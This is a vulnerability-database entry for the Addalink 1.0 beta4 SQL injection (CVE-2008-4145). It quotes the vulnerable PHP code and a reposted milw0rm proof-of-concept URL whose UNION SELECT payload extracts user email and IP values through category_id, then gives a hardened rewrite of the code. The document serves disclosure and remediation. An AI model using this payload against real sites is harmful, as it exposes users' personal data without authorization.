Addalink "user_read_links.php" SQL Injection Vulnerability

Vulnerability ID 1116145 Type SQL injection
Published 2008-09-18 Updated 2008-09-24
CVE CVE-2008-4145 CNNVD-ID CNNVD-200809-334
Platform PHP CVSS score 6.8
|Sources
https://www.exploit-db.com/exploits/6485
https://www.securityfocus.com/bid/80952
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-334
|Details
SQL injection vulnerability in user_read_links.php in Addalink 1.0 beta4 and earlier allows remote attackers to execute arbitrary SQL commands via the category_id parameter when magic_quotes_gpc is disabled.
|Exploit
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Add a link <= 4 - beta || Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/ Script: Add a link
/ Version: <= 4 - beta
/ File affected: user_read_links.php
/ Download: http://sourceforge.net/projects/addalink/
/ need magic_quotes_gpc = Off


Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org


Vuln Code:
--------------

32:  $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
33:  $read_result=mysql_query($read_out_linktable);

....

87:  while($data=mysql_fetch_array($read_result))
88:  {
90:      echo "<tr><td colspan=\"5\">$data[description]</td></tr>";
91:  }

--------------

The var $category_id isn't verified.


Proof of Concept:

http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*


__EOF__

# milw0rm.com [2008-09-18]
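The root cause in the advisory above is that `$category_id` (and the LIMIT values) are interpolated straight into the query string, so the fix does not depend on magic_quotes_gpc at all. The following is an added example, not Addalink's code, showing the same query rebuilt with validated input and PDO prepared statements; the DSN, credentials, table name and the `start`/`steps` parameter names are assumptions.

```php
<?php
// Added example (not Addalink's code): the user_read_links.php query
// pattern rebuilt defensively. Connection details are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=addalink;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares, typed binds
]);

// 1. Validate: category_id is an integer, so anything else is rejected
//    before it can reach SQL. Quoting (magic_quotes_gpc) is irrelevant.
$category_id = filter_input(INPUT_GET, 'category_id', FILTER_VALIDATE_INT);
if ($category_id === false || $category_id === null) {
    http_response_code(400);
    exit('invalid category_id');
}
// Paging values were also interpolated in the original; clamp them to ints.
$start = max(0, (int)($_GET['start'] ?? 0));
$steps = min(100, max(1, (int)($_GET['steps'] ?? 20)));

// 2. Identifiers cannot be bound as parameters: the table name must come
//    from application config and be checked against a fixed list.
$allowed_tables = ['links'];                       // assumed config value
$linktable = 'links';
if (!in_array($linktable, $allowed_tables, true)) {
    exit('bad table configuration');
}

// Original (vulnerable) form, for comparison:
//   "SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id'
//    ORDER BY id DESC LIMIT $start,$steps"
// Hardened form: placeholders, values bound with explicit types.
$stmt = $pdo->prepare(
    "SELECT * FROM `$linktable` WHERE approved = '1' AND category_id = :cid "
  . "ORDER BY id DESC LIMIT :start, :steps"
);
$stmt->bindValue(':cid',   $category_id, PDO::PARAM_INT);
$stmt->bindValue(':start', $start,       PDO::PARAM_INT);
$stmt->bindValue(':steps', $steps,       PDO::PARAM_INT);
$stmt->execute();

// 3. Escape on output as well; the original echoed $data[description] raw.
while ($data = $stmt->fetch(PDO::FETCH_ASSOC)) {
    echo '<tr><td colspan="5">'
       . htmlspecialchars($data['description'], ENT_QUOTES, 'UTF-8')
       . "</td></tr>\n";
}
```

Because the value is bound rather than concatenated, the quote-and-UNION input from the proof of concept is simply rejected by the integer filter, and even a non-integer column would be sent to MySQL as data, not as part of the statement.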
|Affected products
Addalink Addalink 1.0 Beta4
|References

Source: XF
Name: addalink-userreadlinks-sql-injection(45245)
Link: http://xforce.iss.net/xforce/xfdb/45245
Source: MILW0RM
Name: 6485
Link: http://www.milw0rm.com/exploits/6485
Source: VUPEN
Name: ADV-2008-2606
Link: http://www.frsirt.com/english/advisories/2008/2606